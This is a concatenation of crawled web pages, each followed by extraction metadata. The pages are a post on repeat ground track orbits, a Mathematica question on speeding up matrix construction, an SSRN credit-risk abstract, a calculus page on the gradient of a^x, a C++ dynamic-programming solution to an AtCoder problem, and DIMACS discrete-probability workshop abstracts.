$$a_{i+1}= \mu^\frac{1}{3}[(\frac{R}{D})\omega_{b}]^{-\frac{2}{3}}[1-\frac{3}{2}J_{2}(\frac{r_{bq}}{a_{i}})^2(1-\frac{3}{2}\sin(i)^2)]^\frac{2}{3}[1+J_{2}(\frac{r_{bq}}{a_{i}})^2(\frac{3}{2}\frac{R}{D}\cos(i)-\frac{3}{4}(5\cos(i)^2-1))]^\frac{2}{3}$$

Where:

$R$ = integer number of orbits
$D$ = integer number of days
$J_{2}$ = second gravity coefficient
$\omega_{b}$ = inertial rotation rate of the body
$r_{bq}$ = equatorial radius of the body
$i$ = orbital inclination
$\mu$ = gravitational constant of the body

(A small code sketch of this iteration follows at the end of the post.)

So do you know any satellite mission that has a repeat ground track orbit? There are plenty of them! Just to mention one, ICESat (Ice, Cloud, and land Elevation Satellite) was a satellite mission for measuring ice sheet mass balance, cloud and aerosol heights, as well as land topography and vegetation characteristics. If you visit the National Snow & Ice Data Center, you may find some datasets coming from the different versions of ICESat.
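To make the iteration above concrete, here is a minimal Python sketch of Wagner's fixed-point update (the function and variable names are ours, not poliastro's API; a production implementation would also need an iteration cap and other safeguards):

```python
import math

# Units must be consistent, e.g. km, s, rad. For Earth one could use:
#   mu = 398600.4418 (km^3/s^2), J2 = 1.08263e-3,
#   r_eq = 6378.137 (km), omega_body = 7.2921159e-5 (rad/s).
def repeat_groundtrack_sma(R, D, i, mu, J2, r_eq, omega_body, tol=1e-10):
    """Mean semimajor axis for an R-orbits-in-D-days repeat ground track."""
    k = R / D                                     # orbits per day in the cycle
    a = (mu / (k * omega_body) ** 2) ** (1 / 3)   # initial guess a_0
    while True:
        p = (r_eq / a) ** 2
        c1 = (1 - 1.5 * J2 * p * (1 - 1.5 * math.sin(i) ** 2)) ** (2 / 3)
        c2 = (1 + J2 * p * (1.5 * k * math.cos(i)
                            - 0.75 * (5 * math.cos(i) ** 2 - 1))) ** (2 / 3)
        a_new = (mu / (k * omega_body) ** 2) ** (1 / 3) * c1 * c2
        if abs(a_new - a) < tol:                  # converged to tolerance
            return a_new
        a = a_new
```

For instance, a 15-orbits-per-day Earth orbit (R=15, D=1) at roughly 28.5° inclination comes out near a ≈ 6,900 km, i.e. a low Earth orbit, as expected.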
2020-07-05 02:42:17
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.46047160029411316, "perplexity": 1694.0908728739382}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655886865.30/warc/CC-MAIN-20200705023910-20200705053910-00343.warc.gz"}
https://mathematica.stackexchange.com/questions/112612/is-it-possible-to-speedup-these-simple-linear-algebra-operations
# Is it possible to speed up these simple linear algebra operations?

I'm trying to numerically solve some equations using the splitting operator method. The solver I construct iteratively builds a matrix and feeds it to LinearSolve. After profiling the solver, I found that half of the time is spent on simple linear algebra operations before LinearSolve, and I would like to speed up this process if possible.

Consider this simple example of a matrix operation:

Needs["CompiledFunctionTools`"]
Needs["Experimental`"]
lth = 200;
mtx = RandomReal[{0, 1}, {lth, lth}];
ls = RandomReal[{0, 1}, {lth}];
Et = Function[{t}, Sin[(π t)/20] Sin[2 t]];

and I'm trying to construct the matrix IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx) repeatedly, with different t:

Table[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming
(* {1.33086, Null} *)

As a comparison, LinearSolve is roughly 1.5X faster when solving a matrix equation of the same size:

Table[LinearSolve[mtx, ls];, {t, 0., 20, 0.01}]; // AbsoluteTiming
(* {0.883315, Null} *)

So my goal is to speed up the matrix operation, especially considering that my matrix operation is much simpler than what is required to solve a dense matrix equation in LinearSolve.

We can try to compile the functions:

Etc = Compile[{{t, _Real}}, Et[t], CompilationOptions -> {"InlineCompiledFunctions" -> True, "InlineExternalDefinitions" -> True}];
Htc = Compile[{{t, _Real}}, IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx), CompilationOptions -> {"InlineCompiledFunctions" -> True, "InlineExternalDefinitions" -> True}];

and compare the different ways:

Table[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming
Table[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Etc[t]*mtx);, {t, 0., 20, 0.01}]; // AbsoluteTiming
Table[Htc[t];, {t, 0., 20, 0.01}]; // AbsoluteTiming
(* {1.33086, Null} *)
(* {1.29705, Null} *)
(* {2.26304, Null} *)

We have two observations:

1. We gain only very little speedup by compiling the function Et.
2. We slow down by almost 70% by compiling the whole matrix operation.

For the first point, I'm guessing this may be due to the automatic compilation of Table. For the second point, we may look at the compiled code of the function Htc:

"(*omitted*)
1 T(I2)0 = MainEvaluate[ Hold[IdentityMatrix][ I0]]
2 T(R2)2 = MainEvaluate[ Hold[DiagonalMatrix][ T(R1)1]]
3 R1 = R0
4 R5 = I1
5 R3 = Reciprocal[ R5]
6 R5 = R2 * R1 * R3
7 R3 = Sin[ R5]
8 R5 = I2
9 R5 = R5 * R1
10 R6 = Sin[ R5]
11 R3 = R3 * R6
12 T(R2)4 = R3 * T(R2)3
13 T(R2)2 = T(R2)2 + T(R2)4
14 T(C2)4 = C0 * T(R2)2
15 T(C2)2 = CoerceTensor[ I3, T(I2)0]]
16 T(C2)2 = T(C2)2 + T(C2)4
17 Return "

We can see that it has two calls to MainEvaluate, to compute IdentityMatrix and DiagonalMatrix. So this slowdown may come from repeatedly invoking the main evaluator, although in the comment here Oleksandr R. pointed out that IdentityMatrix is called using opcode 47, which should give very small overhead.

We can try to remove the MainEvaluate calls completely by expanding the matrix using Silvia's construction (this construction is a workaround for a problem of OptimizedExpression):

Htc2 = Compile[{{t, _Real}},
  Evaluate[
   OptimizeExpression[
      Hold[IdentityMatrix[lth] + I (DiagonalMatrix[ls] + Et[t]*mtx)] /. Et -> EtTemp // ReleaseHold] /.
    EtTemp[x_] :> With[{val = Et[x]}, val /; True]]];

Table[Htc2[t];, {t, 0., 20, 0.01}]; // AbsoluteTiming
(* {5.30743, Null} *)

However, we see an almost 2X slowdown, for some reason.

We can also try to simplify the matrix operations manually by removing IdentityMatrix, which gains an almost 2X speedup:

Table[DiagonalMatrix[1. + I ls] + I Etc[t]*mtx;, {t, 0., 20, 0.01}]; // AbsoluteTiming
(* {0.728859, Null} *)

But I'm still wondering: Is it possible to further speed up the matrix operations?

Version: 10.4 on OS X 10.11.4.

Note: This is a follow-up question to the question here.
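For readers outside Mathematica, the same precomputation trick in the last timing (fold the identity into the diagonal part once, then do a single scale-and-add per time step) looks like this in NumPy; this is our illustrative sketch only, and it says nothing about Mathematica's internals:

```python
import numpy as np

lth = 200
rng = np.random.default_rng(0)
mtx = rng.random((lth, lth))
ls = rng.random(lth)

# t-independent pieces, built once outside the loop
base = np.diag(1.0 + 1j * ls)    # analogue of DiagonalMatrix[1. + I ls]
imtx = 1j * mtx                  # I*mtx, also precomputed

def Et(t):
    return np.sin(np.pi * t / 20.0) * np.sin(2.0 * t)

for t in np.arange(0.0, 20.0, 0.01):
    H = base + Et(t) * imtx      # matrix that would be fed to the solver
```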
2019-10-21 11:24:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5436608791351318, "perplexity": 11115.613681090785}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987769323.92/warc/CC-MAIN-20191021093533-20191021121033-00341.warc.gz"}
https://papers.ssrn.com/sol3/papers.cfm?abstract_id=756125&rec=1&srcabs=970480&alg=7&pos=4
# Portfolio Credit Risk with Extremal Dependence

31 Pages. Posted: 15 Jul 2005

Achal Bassamboo, Northwestern University - Department of Managerial Economics and Decision Sciences (MEDS)
Sandeep Juneja, Tata Institute of Fundamental Research (TIFR)
Assaf Zeevi, Columbia Business School - Decision Risk and Operations

Date Written: July 1, 2005

### Abstract

We consider the risk of a portfolio comprised of loans, bonds, and financial instruments that are subject to possible default. In particular, we are interested in the probability that the portfolio will incur large losses over a fixed time horizon. Contrary to the normal copula that is commonly used in practice (e.g., in the CreditMetrics system), we assume a portfolio dependence structure that supports *extremal dependence* among obligors and does not hinge solely on correlation. A particular instance within this model class is the so-called $t$-copula model, which is derived from the multivariate Student $t$ distribution and hence generalizes the normal copula model. The size of the portfolio, the heterogeneous mix of obligors, and the fact that default events are rare and mutually dependent make it quite complicated to calculate portfolio credit risk either by means of exact analysis or naive Monte Carlo simulation. The main contributions of this paper are twofold. We first derive sharp asymptotics for portfolio credit risk that illustrate the implications of extremal dependence among obligors. Using this as a stepping stone, we develop multi-stage importance sampling algorithms that are shown to be asymptotically optimal and can be used to efficiently compute portfolio credit risk via Monte Carlo simulation.

Keywords: Portfolio, credit, asymptotics, simulation, importance sampling, rare events, risk management

JEL Classification: C15, G3

Suggested Citation: Bassamboo, Achal, Juneja, Sandeep, and Zeevi, Assaf, Portfolio Credit Risk with Extremal Dependence (July 1, 2005). Available at SSRN: https://ssrn.com/abstract=756125 or http://dx.doi.org/10.2139/ssrn.756125
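To illustrate the generic idea behind importance sampling for rare events (our toy example only; the abstract gives no detail of the authors' multi-stage algorithm, and this is not it), here is a Python sketch estimating the Gaussian tail probability $P(Z > 4)$ by sampling from a shifted distribution and reweighting:

```python
import math, random

# Estimate P(Z > 4), Z ~ N(0,1), by sampling X ~ N(4,1) and reweighting
# each hit by the likelihood ratio phi(x)/phi_4(x) = exp(-4x + 8).
def tail_prob_is(a=4.0, n=100_000, seed=1):
    rng = random.Random(seed)
    total = 0.0
    for _ in range(n):
        x = rng.gauss(a, 1.0)            # proposal: mean shifted to a
        if x > a:
            total += math.exp(-a * x + a * a / 2.0)
    return total / n

print(tail_prob_is())   # ~3.17e-5; naive sampling would see only ~3 hits in 1e5
```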
2019-10-20 04:49:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4223346710205078, "perplexity": 1962.9962070255503}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986702077.71/warc/CC-MAIN-20191020024805-20191020052305-00464.warc.gz"}
https://undergroundmathematics.org/calculus-trig-log/to-the-limit/special-case
### Calculus of Trigonometry & Logarithms

We have found that the gradient function of $a^x$ can be written as $f'(x) = a^x\times f'(0),$ i.e. the gradient function is the function itself multiplied by a constant, and this constant is the gradient of $a^x$ at $x = 0$. There is a special case when $f'(0) = 1$, for then the gradient function of $a^x$ is $a^x$ itself. Before using the applet, look at the values given. Approximately what value do you think $a$ will take to give $f'(0) \approx 1$? Use the slider to find the value of $a$ when $f'(0) \approx 1$.
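If you don't have the applet to hand, you can reproduce the experiment numerically; this sketch is our own addition (not part of the original page), estimating $f'(0)$ with a central difference and bisecting on $a$:

```python
# Estimate f'(0) for f(x) = a**x, then search for the a with f'(0) = 1.
# (Analytically f'(0) = ln(a), so the slider should land near e.)
def fprime_at_zero(a, h=1e-6):
    return (a**h - a**(-h)) / (2 * h)   # central difference

lo, hi = 2.0, 3.0          # f'(0) increases with a, so bisection works
for _ in range(60):
    mid = (lo + hi) / 2
    if fprime_at_zero(mid) < 1.0:
        lo = mid
    else:
        hi = mid
print(lo)                  # ≈ 2.718281..., i.e. Euler's number e
```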
2018-01-17 10:42:12
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8160043954849243, "perplexity": 195.70146980186303}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886895.18/warc/CC-MAIN-20180117102533-20180117122533-00763.warc.gz"}
https://io.zouht.com/52.html
# [Problem] Distance Sequence

NOMURA Programming Contest 2022 (AtCoder Beginner Contest 253), E - Distance Sequence

Time Limit: 2 sec / Memory Limit: 1024 MB. Score: $500$ points

### Problem Statement

How many integer sequences $A=(A_1,\ldots,A_N)$ of length $N$ satisfy all the conditions below?

• $1\le A_i \le M$ $(1 \le i \le N)$
• $|A_i - A_{i+1}| \geq K$ $(1 \le i \le N - 1)$

Since the count can be enormous, find it modulo $998244353$.

### Constraints

• $2 \leq N \leq 1000$
• $1 \leq M \leq 5000$
• $0 \leq K \leq M-1$
• All values in input are integers.

### Input

Input is given from Standard Input in the following format: $N$ $M$ $K$

### Output

Print the count modulo $998244353$.

### Sample Input 1

2 3 1

### Sample Output 1

6

The following $6$ sequences satisfy the conditions: $(1,2)$, $(1,3)$, $(2,1)$, $(2,3)$, $(3,1)$, $(3,2)$.

### Sample Input 2

3 3 2

### Sample Output 2

2

The following $2$ sequences satisfy the conditions: $(1,3,1)$ and $(3,1,3)$.

### Sample Input 3

100 1000 500

### Sample Output 3

657064711

### My Notes

Let $dp[i][j]$ be the number of valid sequences of length $i$ that end with the value $j$. Then

$$dp[i+1][j]=(dp[i][1]+\dots+dp[i][j-K])+(dp[i][j+K]+\dots+dp[i][M])$$

Evaluating these range sums naively costs $O(NM^2)$; maintaining a prefix-sum array over $dp[i][\cdot]$ makes each transition $O(1)$, for $O(NM)$ overall. The case $K=0$ needs special handling, since the two ranges would then overlap at $j$ itself.

### Code

#include <bits/stdc++.h>
using namespace std;
const int MAXN = 1010, MAXM = 5010, MOD = 998244353;
int N, M, K;
long long dp[MAXN][MAXM]; // dp[i][j]: sequences of length i ending with value j
long long ps[MAXM];       // prefix sums of the previous dp row
int main()
{
    cin >> N >> M >> K;
    for (int i = 1; i <= M; i++)
        dp[1][i] = 1;
    for (int i = 2; i <= N; i++)
    {
        memset(ps, 0, sizeof(ps));
        for (int j = 1; j <= M; j++)
        {
            ps[j] = ps[j - 1] + dp[i - 1][j];
            ps[j] %= MOD;
        }
        for (int j = 1; j <= M; j++)
        {
            if (K == 0)
            {
                // every previous value is allowed; avoid double-counting j
                dp[i][j] = ps[M];
                continue;
            }
            if (j - K >= 1)
            {
                // previous values in [1, j-K]
                dp[i][j] += MOD + ps[j - K] - ps[0];
                dp[i][j] %= MOD;
            }
            if (j + K <= M)
            {
                // previous values in [j+K, M]
                dp[i][j] += MOD + ps[M] - ps[j + K - 1];
                dp[i][j] %= MOD;
            }
        }
    }
    long long ans = 0;
    for (int i = 1; i <= M; i++)
    {
        ans += dp[N][i];
        ans %= MOD;
    }
    cout << ans << endl;
    return 0;
}
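As a quick cross-check of the recurrence (our own addition, not part of the original write-up), a brute-force enumeration in Python reproduces the small samples; it is only feasible for tiny $N$ and $M$:

```python
from itertools import product

# Count sequences in {1..M}^N with |A_i - A_{i+1}| >= K, by enumeration.
def brute(N, M, K, MOD=998244353):
    count = 0
    for seq in product(range(1, M + 1), repeat=N):
        if all(abs(seq[i] - seq[i + 1]) >= K for i in range(N - 1)):
            count += 1
    return count % MOD

print(brute(2, 3, 1))  # 6, matches Sample 1
print(brute(3, 3, 2))  # 2, matches Sample 2
```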
2022-07-05 11:56:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4604155421257019, "perplexity": 9528.708825369122}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104576719.83/warc/CC-MAIN-20220705113756-20220705143756-00660.warc.gz"}
http://www.dimacs.rutgers.edu/Workshops/Microsurveys/abstracts.html
### Microsurveys in Discrete Probability: Abstracts

#### June 2 - 6, 1997
Institute for Advanced Study, Princeton, New Jersey

Organizers: David Aldous, Jim Propp

Presented under the auspices of the DIMACS Special Focus on Discrete Probability.

#### Abstracts

David Aldous, University of California - Berkeley
"Tree- and Forest-Valued Markov Processes"

Such processes arise in several different areas. (a) The Markov chain tree theorem associates to any finite-state Markov chain an accompanying spanning-tree-valued chain (cf. Russ Lyons' talk). (b) Percolation-type processes on an infinite regular tree can be viewed as forest-valued processes (cf. Olle Haggstrom's talk). (c) There is scientific literature on coagulation-fragmentation models, in which N atoms are arranged in clusters, with specified rates for two clusters to merge into one cluster, or one cluster to split into two clusters. This typically leads to an irreversible Markov process. An alternative approach (cf. Whittle's book "Systems in Stochastic Equilibrium") is to first specify a stationary distribution via a Hamiltonian and then invent a reversible chain with that stationary distribution.

The talk will briefly survey (c), and then describe a new process T(t) which relates to all these areas. T(t) is a stationary tree-valued Markov process whose stationary distribution is PGW(1), the Galton-Watson tree with Poisson(1) offspring. It evolves by attaching to each vertex, at rate 1, a copy of a PGW(1) tree; when a branch becomes infinite, it is cut down. The time-reversal also has a simple description: each edge is cut at rate 1, and at rate 1 new branches arrive with the distribution PGW^*(1), which is PGW(1) conditioned to be infinite.

One way T(t) arises is as an $N \to \infty$ limit in (a), where the underlying chain is i.i.d. sampling from $\{1,\dots,N\}$. It relates to one aspect of (c), the "post-gelation solution of the Smoluchowski coagulation equation", which is roughly the classical random graph process (cf. Boris Pittel's talk) in which small components are forbidden to merge with large components. A broad conceptual theme is that the idea of a mean-field model can often be implemented as either a "random graph" model or an "infinite tree" model.

Parallel to T(t) is a forest-valued process F(t) inside a regular infinite tree. Curiously, it is easy to do calculations with F(t) but hard to prove rigorously that it exists! Some relevant papers, in particular an extensive survey of coalescence-type processes (c), can be found via the author's homepage http://www.stat.berkeley.edu/users/aldous

Richard Arratia, University of Southern California
"On the central role of the scale invariant Poisson processes on $(0,\infty)$" (January 31, 1997)
(Richard Arratia is professor of mathematics at the University of Southern California; e-mail rarratia@math.usc.edu. Work supported in part by NSF grants DMS 90-05833 and DMS 96-26412.)

Abstract: The scale invariant Poisson processes on $(0,\infty)$ play a central role in number theory, combinatorics, and genetics. They give the continuous limits which underlie and unify diverse discrete structures, including the prime factorization of a uniformly chosen integer, the factorization of polynomials over finite fields, the decomposition into cycles of random permutations, the decomposition into components of random mappings, and the Ewens sampling formula. They deserve attention as one of the fundamental objects of probability theory.

Scale invariance, say of a random set $\mathcal{X} \subset \mathbb{R}$, is the property that for all $c>0$, $c\mathcal{X} \stackrel{d}{=} \mathcal{X}$. For random subsets of $(0,\infty)$, we can take logarithms to convert from scale invariance to translation invariance. Since the only translation invariant positive measures on $\mathbb{R}$ are multiples $\theta\,dx$ of Lebesgue measure, with $\theta >0$, this gives a complete classification of the scale invariant Poisson processes on $(0,\infty)$. The net result is that scale invariant Poisson processes on $(0,\infty)$ have an intensity of the form $\theta\,dx/x$ for some $\theta >0$.

The first subtle thing to realize about these scale invariant processes is that the plural is essential! That is, for translation invariant Poisson processes on $\mathbb{R}$ with intensity $\theta\,dx$, there is no need to study the effect of $\theta$, since all the processes are related simply by scaling. But no such simple relation holds for the scale invariant processes: the map which constructs, say, the general $\theta$ process from the special case $\theta=1$ applies the $1/\theta$ power to the location of each point. This is not a simple mapping. In particular, there are qualitative phase transitions at $\theta =1$ and at $\theta = 1/\log 2$.

For any $\theta >0$, start with the ordinary, translation invariant Poisson process on $\mathbb{R}$ having intensity $\theta\,dx$ and label the points as $L_i,\ i \in \mathbb{Z}$, with the natural order $L_i < L_{i+1}$. The scale-invariant process with intensity $\theta\,dx/x$ can be realized via $X_i := \exp(-L_i)$, which labels the points so that $X_i > X_{i+1}$. The $i$th spacing of the scale invariant Poisson process is thus $Y_i := X_i-X_{i+1}$. Theorem: for each $\theta > 0$, $\{Y_i\} \stackrel{d}{=} \{X_i\}$, i.e. the set of spacings, as a point process, has the same distribution as the original process.

Let $T$ be the sum of the locations of all points of the scale invariant Poisson process restricted to $(0,1)$. Theorem: the Poisson-Dirichlet process is this restricted process, conditional on $T=1$. [Barbour, Tavaré] The random variable $T$ has a density $g$ which for $\theta=1$ is $g(u) = e^{-\gamma}\rho(u)$, where $\rho$ is Dickman's function, satisfying $\rho(u)=1$ for $0\leq u \leq 1$, and $\rho'(u)=-\rho(u-1)/u$ for $u>1$.

For $0 \leq a < b <\infty$, let $T_{a,b}$ be the sum of the locations of all points of the scale invariant Poisson process restricted to $(a,b)$. Buchstab's function $\omega$, which satisfies $(u\,\omega(u))'=\omega(u-1)$ for $u>2$ and $u\,\omega(u)=1$ for $1 \leq u \leq 2$, can be described as the density of the continuous part of $T_{1/u,1}$ evaluated at 1 in the case $\theta=1$.

Consider, for any $\theta >0$ and $0\leq \beta \leq 1$, the total variation distance $H(\beta)$ between the restrictions to $[0,\beta]$ of the Poisson-Dirichlet process and the scale invariant Poisson process. We have $H(0)=0$, $H(1)=1$, and for $0<\beta<1$, $H(\beta) = d_{TV}\big( T_{0,\beta},\ (T_{0,\beta}\mid T=1) \big)$. This can be expressed as an integral involving the densities of $T$ and $T_{\beta,1}$ [Tavaré], which in the special case $\theta=1$ reduces to

$$2H(\beta) = e^\gamma\,\mathbb{E}\,\big|\omega(u-T)-e^{-\gamma}\big| + \rho(u) = \int_{t>0} \big|\omega(u-t)-e^{-\gamma}\big|\,\rho(t)\,dt + \rho(u).$$

This $H(\beta)$ gives the limit, as $n \to \infty$, of the total variation distance between the dependent system and its independent process limit, observing components of relative size at most $\beta$, for discrete systems including the cycle decomposition of a random permutation of $n$ objects [Tavaré, Stark], the component decomposition of a random mapping [Stark], and the prime factorization of a random integer chosen uniformly from 1 to $n$ [Stark].

Consider the random set $A \equiv A(\theta)$, defined as the closure of the set of sums of locations of (some of the) points of the scale invariant Poisson process. Trivially, $A$ is scale invariant, i.e. for any $c>0$, $cA \stackrel{d}{=} A$. Quite easily, with respect to Minkowski sums, the process $(A(\theta))_{\theta>0}$ has stationary, independent increments. The set $A$ for $\theta=1$ is the limit in distribution, using the Hausdorff metric, of spatial rescalings of the set of values $\log d$ for $d$ dividing an integer chosen uniformly from 1 to $n$. For general $\theta \neq 1$, the analogous statement holds, after conditioning on the large deviation that the random integer have $\theta \log\log n$ distinct prime divisors. It is easy to prove that for all $\theta$, $\mathbb{P}(1 \in A)<1$, and for $\theta \log 2 \leq 1$, $\mathbb{P}(1 \in A)=0$. Conversely, for $\theta \log 2 >1$, $\mathbb{P}(1 \in A) >0$, although we still do not have a simple probabilistic proof of this. [Tenenbaum]

Persi Diaconis, Cornell University
"New Wave Monte Carlo"

Just when we think things have settled down, practitioners evolve interesting ideas and spectacular claims. I will review four of these. 1) Hybrid and Nonreversible Algorithms. The algorithm of Duane, et al. (Phys. Lett. B 195, 216-222) uses Hamiltonian mechanics to drive a sampler. In joint work with Susan Holmes and Radford Neal we have abstracted the idea and proved some things. 2) Demon Algorithms. These use an army of Maxwell's demons to control a random walk. In joint work with Thomas Yan some rigorous results have emerged. See Bhanot, et al., Nucl. Phys. B235, 417-434. 3) Crossover Algorithms. People in computational group theory (Celler et al., Comm. Alg. 23, 4931-4948) report fantastic speedups by random mating of vectors of a population. With Laurent Saloff-Coste we have managed to prove a bit and suggest extensions far from group theory. 4) Beyond Groebner Bases. In joint work with Sturmfels (see e.g. chapters 5, 6 of B. Sturmfels, Groebner Bases and Convex Polytopes (1996)) computational algebra was used to build Markov chains. In recent implementations (with David Eisenbud, Susan Holmes and Asya Rabinowitch) new ideas have been introduced that speed up (or make feasible) large scale problems.

Jim Fill, The Johns Hopkins University
"Probabilistic analysis of self-organizing search"

A self-organizing data structure dynamically maintains a file of records in easily retrievable order while using up little additional memory space. Recent analyses of simple Markov chain models have produced new information about such systems, including exact and asymptotic expressions, with rates of convergence to stationarity, for the distribution of search cost and for transition probabilities for the structure as a whole. My microsurvey will focus on some of the following: connections with card shuffling, list and tree structures, various reorganization rules, Markov-dependent request sequences, and multi-record request schemes.
Alan Frieze and Wojciech Szpankowski
"Greedy algorithms for the shortest common superstring that are asymptotically optimal"

There has recently been a resurgence of interest in the *shortest common superstring* problem due to its important applications in molecular biology (e.g., recombination of DNA) and data compression. The problem is NP-hard, but it has been known for some time that greedy algorithms work well for this problem. More precisely, it was proved in a recent sequence of papers that in the worst case a greedy algorithm produces a superstring that is at most $\beta$ times ($2 \leq \beta \leq 4$) worse than optimal. We analyze the problem in a probabilistic framework, and consider the optimal total overlap $O_n^{\rm opt}$ and the overlap $O_n^{\rm gr}$ produced by various greedy algorithms. These turn out to be asymptotically equivalent. We show that with high probability

$$\lim_{n \to \infty} \frac{O_n^{\rm opt}}{n\log n} = \lim_{n \to \infty} \frac{O_n^{\rm gr}}{n\log n} = \frac{1}{H},$$

where $n$ is the number of original strings and $H$ is the entropy of the underlying alphabet. Our results hold under a condition that the lengths of all strings are not too short. This is joint work with Wojciech Szpankowski.

Anant P. Godbole, Michigan Tech University
"A method of unbounded martingale differences, with combinatorial applications"

We use decoupling methods due to Kwapień and Woyczyński (1992) to derive an analog of the Hoeffding-Azuma exponential bound when the martingale differences are not uniformly bounded. Related inequalities due to Pinelis and de la Peña will also be presented. Applications of the method to concentration of measure questions for

• proximity graphs for random scatter in d dimensions; and
• the Wiener index of a random graph; and to similar questions concerning
• linear independence of random binary vectors

will be provided.

Olle Haggstrom, Chalmers University of Technology
"Dynamical percolation: early results and open problems"

Dynamical percolation provides a way of introducing time dynamics into static percolation models such as the standard bond percolation setup. Any event which has probability 1 in the static model will almost surely happen at Lebesgue-almost every time $t$ in the dynamical counterpart. The main questions studied are therefore of the type "can there be exceptional times?". Interestingly, the answer is often yes if the static model is taken to be critical. I intend to survey what has been done in dynamical percolation since the subject entered the probability arena two years ago, and to state the main open problems.

Martin Hildebrand, SUNY-Albany
"Rates of Convergence for a Non-reversible Version of the Metropolis Algorithm"

Diaconis, Holmes, and Neal have proposed a variation of the Metropolis algorithm. Like the usual Metropolis algorithm, this variation is a Markov chain which converges to a stationary probability distribution, and ratios of this stationary probability are used in the transition probabilities. This variation involves duplicating the set of states; the transition probabilities depend on which duplicate the Markov chain is in just before the transition. For some probabilities and choices of a parameter which controls the probabilities of going between the duplicates of the set of states, this variation converges to stationarity faster than the corresponding ordinary Metropolis algorithm. This talk will outline proofs of how fast the variation converges to the uniform distribution in some of these circumstances.

Alan Frieze and Ravi Kannan, Carnegie-Mellon University
"Quick approximations to matrices"

